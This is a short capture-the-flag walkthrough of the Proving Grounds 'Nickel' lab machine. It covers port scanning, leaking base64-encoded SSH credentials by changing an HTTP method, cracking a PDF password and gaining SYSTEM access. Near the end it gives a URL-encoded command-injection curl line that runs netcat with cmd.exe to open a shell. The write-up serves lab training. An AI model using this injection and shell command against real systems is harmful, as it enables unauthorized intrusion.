Proving Grounds Practice — Nickel

Hello, today I’ll talk about the solution of Proving grounds Practice — Nickel.

First, we run an Nmap scan.

When we examined the website on port 80, we encountered a screen as follows.

When we examined the website on port 33333, we encountered a screen as follows.

When we examined the website on port 8089, we encountered a screen as follows.

When we examined the source of this page, we encountered directories going to port 33333 with a different ip. Then we tried to go to these pages with our own IP address. We noticed that we could not navigate to the relevant list-running-procs directory with a GET request.

When we sent the request again by changing the method with Burp Suite, we encountered ssh login information. We have decoded the password with base64 and obtained it.

Then we got a pdf file in ftp with this user information. We cracked the password with pdf2crack tool. And he gave us various information in the pdf document.

When we run the whoami command in the command enpoint, we noticed that there is nt authority / system on port 80.

We sent the netcat exe via SSH connection.

We performed listening with netcat on one of two separate ssh connections. In the other, we ran the command to run the nc exe over port 80 with curl.

curl http://nickel/?cmd%20%2Fc%20C%3A%5CUsers%5Cariah%5Cnc.exe%20127.0.0.1%204444%20-e%20cmd.exe

Yes, we now have nt authority / system. We can get our proof.txt file.

We find our flag and complete the challenge. Keep hacking !

Practice makes perfect :)